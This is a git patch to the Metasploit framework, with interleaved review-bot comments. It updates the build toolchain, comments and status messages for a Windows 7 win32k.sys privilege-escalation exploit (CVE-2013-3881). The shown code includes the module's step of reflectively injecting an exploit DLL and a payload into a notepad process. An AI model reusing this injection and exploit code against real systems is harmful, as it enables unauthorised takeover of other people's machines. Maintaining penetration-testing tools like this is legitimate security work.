From 0ac1acda70765844b149bf3a18bf833651a26e48 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Mon, 10 Feb 2014 09:35:07 -0500 Subject: [PATCH] Upgrade toolchain to Visual Studio 2013 v120. --- .../cve-2013-3881/cve-2013-3881/cve-2013-3881.c | 8 ++++++-- .../cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj | 8 ++++---- modules/exploits/windows/local/win32k_null_page.rb | 10 +++++----- 3 files changed, 15 insertions(+), 11 deletions(-) diff --git a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c index 8f5ef28b0a..9389277e09 100755 --- a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c +++ b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c @@ -3,7 +3,7 @@ * Date: February 5, 2014 * Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame * Exploit Author: Spencer McIntyre - * Version: Windows 7 SP1 + * Version: Windows 7 SP0/SP1 * Tested on: Windows 7 SP0/SP1 * CVE-2013-3881 MS13-081 * References: @@ -22,7 +22,11 @@ #define WIN32_NO_STATUS #include #undef WIN32_NO_STATUS -#include + +#ifndef _NTDEF_ +typedef __success(return >= 0) LONG NTSTATUS; +typedef NTSTATUS *PNTSTATUS; +#endif #define TABLE_BASE 0xff910000 diff --git a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj index b8d7835d89..634f972b10 100755 --- a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj +++ b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj @@ -1,5 +1,5 @@  - + Debug @@ -20,14 +20,14 @@ true false MultiByte - v90 + v120 DynamicLibrary false false MultiByte - v90 + v120 @@ -82,4 +82,4 @@ - + \ No newline at end of file diff --git a/modules/exploits/windows/local/win32k_null_page.rb b/modules/exploits/windows/local/win32k_null_page.rb index 7987745f81..276d38144c 100644 
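Review bot: In the second hunk of cve-2013-3881.c the `#define WIN32_NO_STATUS` / `#undef WIN32_NO_STATUS` pair stays in place, although the `#include` that followed it is removed. That pair keeps the Windows headers from defining the STATUS_* codes, presumably so the removed header could supply them. Any STATUS_ constant used further down (not visible in this hunk) would therefore be left without a definition; either drop the pair or confirm that none is used. The new typedef block also has no comment explaining why NTSTATUS is now declared locally. A line such as `/* NTSTATUS declared here so the build does not depend on the NT status header; skipped when ntdef.h is present */` above `#ifndef _NTDEF_` would cover it, if that is the reason.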
--- a/modules/exploits/windows/local/win32k_null_page.rb
+++ b/modules/exploits/windows/local/win32k_null_page.rb
@@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Local
 'Description' => %q{
 This module exploits a vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to
- the EndMenuState. This module has been tested successfully on
- Windows 7 SP0 and Windows 7 SP1.
+ the MNEndMenuState procedure. This module has been tested
+ successfully on Windows 7 SP0 and Windows 7 SP1.
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -102,15 +102,15 @@ class Metasploit3 < Msf::Exploit::Local
 process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
 print_good("Process #{process.pid} launched.")
- print_status("Reflectively injecting the exploit DLL into #{process.getpid}...")
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
 library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-3881", "cve-2013-3881.x86.dll")
 library_path = ::File.expand_path(library_path)
- print_status("Injecting exploit into #{process.getpid} ...")
+ print_status("Injecting exploit into #{process.pid}...")
 exploit_mem, offset = inject_dll_into_process(process, library_path)
- print_status("Exploit injected. Injecting payload into #{process.getpid}...")
+ print_status("Exploit injected. Injecting payload into #{process.pid}...")
 payload_mem = inject_into_process(process, payload.encoded)
 # invoke the exploit, passing in the address of the payload that
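Review bot: In the second hunk of win32k_null_page.rb the new side still prints two status lines for a single step. `print_status("Reflectively injecting the exploit DLL into #{process.pid}...")` and, two statements later, `print_status("Injecting exploit into #{process.pid}...")` both precede the one `inject_dll_into_process` call. Since both lines are being edited anyway, I would drop the first and keep the one directly before the call, so the console shows one message per action. The enclosing method starts and ends outside the hunk.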